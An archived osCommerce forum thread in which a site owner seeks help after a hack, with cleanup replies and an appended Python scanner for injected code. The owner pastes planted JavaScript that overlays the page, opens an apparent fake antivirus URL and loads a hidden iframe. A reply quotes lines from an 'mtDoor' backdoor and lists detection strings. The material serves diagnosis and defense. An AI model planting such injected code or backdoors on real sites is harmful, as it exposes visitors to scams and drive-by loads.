site hacked google warnings too...pls help


natashome

I wouldn't have noticed that my site was hacked if Google hadn't sent me an email letting me know that it found some hidden keywords in my pages and it breaks their rules and some pages were taken off the index.

I took a look at my FTP and in that particular domain indeed there were some extra files like this:

 

1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords

2. a file named Iog.php which contained the following code:

 

document.write('<div style="position: absolute; top: 0; left: 0; width: 100%;  height: 4000px;  background-color: #FFFFFF; padding: 0px">');
function go()
{
window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100");
}
document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-"  onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>');

 

3. a logs file which again has a lot of links and keywords

 

I deleted these 2 files and the folder, but they are re-created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777.

 

I couldn't find those keywords hidden in my pages at all.

 

Does anyone have any clue?

 

Thanks

Ask the host to wipe the site then restore from the last known clean backup; often the only way to be sure it's all gone.

 

Then add security http://www.oscommerce.com/forums/index.php?showtopic=313323

 

 

Sam

Many times a hacker will hide a file somewhere deep within the site that can be used to restore his code, so that may be what is happening. If they are being recreated after a time, it might be that the hacker is just getting back in. If you had had the SiteMonitor addon installed (see My Addons), you would have known about this before Google did. You should still install it and run the hacker test. It might help you locate such hidden files.

  • 8 months later...

We had the same problem. In our case it was a file called hit.php that was in the root of the site creating and altering folder permissions. For the xdata issue, do a search on your entire site for any of these entries:

/***********************\
| Private |
| Coding by nsh |
| mtDoor v.0.0.1 |
\***********************/

@mkdir("./.xdata");
@chmod("./.xdata", 0777);

We were never able to delete the xdata folder, but were able to rename it and drop the permissions to 0444, after deleting the hit.php file.

Doing a site-wide search for 'preg_replace', 'base64_decode', '<iframe', and 'eval' revealed a TON of malicious code injected in many places, even above the osCommerce store folder level. Any code on a page above the osCommerce comment intro on the page doesn't belong there.

 

Hope that info will be of help to someone.

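The site-wide search described in the last reply, sketched as an added example (not code from the thread or from osCommerce): it flags files containing the strings that reply lists, directories writable by everyone, and PHP files with content above the header comment. The `$Id` header layout and the sample tree built by `make_sample` are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile
from pathlib import Path

# Strings the post says to search for, plus the backdoor markers it quotes.
MARKERS = [("preg_replace", r"preg_replace\s*\("), ("base64_decode", r"base64_decode\s*\("),
           ("<iframe", r"<iframe"), ("eval", r"\beval\s*\("),
           ("mtDoor", r"mtDoor"), (".xdata", r"\.xdata")]
MARKERS = [(label, re.compile(rx, re.IGNORECASE)) for label, rx in MARKERS]
# Assumption: a stock osCommerce PHP file opens with "<?php", "/*", then a "$Id" line.
CLEAN_PREFIX = re.compile(r"\A\s*<\?php\s*/\*\s*\Z")


def scan(root):
    """Return sorted (relative path, reason) findings for everything under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            if os.lstat(full).st_mode & 0o002:  # writable by "other", e.g. 0777
                findings.append((os.path.relpath(full, root), "world-writable dir"))
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            text = Path(root, rel).read_text(errors="replace")
            findings += [(rel, "marker: " + label) for label, rx in MARKERS if rx.search(text)]
            # Anything before the "$Id" header other than "<?php /*" was prepended later.
            if name.endswith(".php") and "$Id" in text:
                if not CLEAN_PREFIX.match(text.split("$Id", 1)[0]):
                    findings.append((rel, "code above header comment"))
    return sorted(findings)


def make_sample(root):
    """Constructed test tree: one clean file, two tampered files, a 0777 .xdata dir."""
    files = {
        "clean.php": "<?php\n/*\n  $Id: clean.php $\n*/\necho 'ok';\n",
        "index.php": '<?php @mkdir("./.xdata"); ?><?php\n/*\n  $Id: index.php $\n*/\n',
        "hit.php": '<?php /* mtDoor */ eval(base64_decode("ZWNobyAxOw==")); ?>\n',
    }
    for name, body in files.items():
        Path(root, name).write_text(body)
    os.mkdir(os.path.join(root, ".xdata"))
    os.chmod(os.path.join(root, ".xdata"), 0o777)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        make_sample(tmp)
        print(*scan(tmp), sep="\n")
```

Legitimate PHP code can also call these functions, so marker hits are candidates for manual review rather than proof of compromise; run the scan from the account root, not just the store folder, since the reply found injected code above it.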

Archived

This topic is now archived and is closed to further replies.
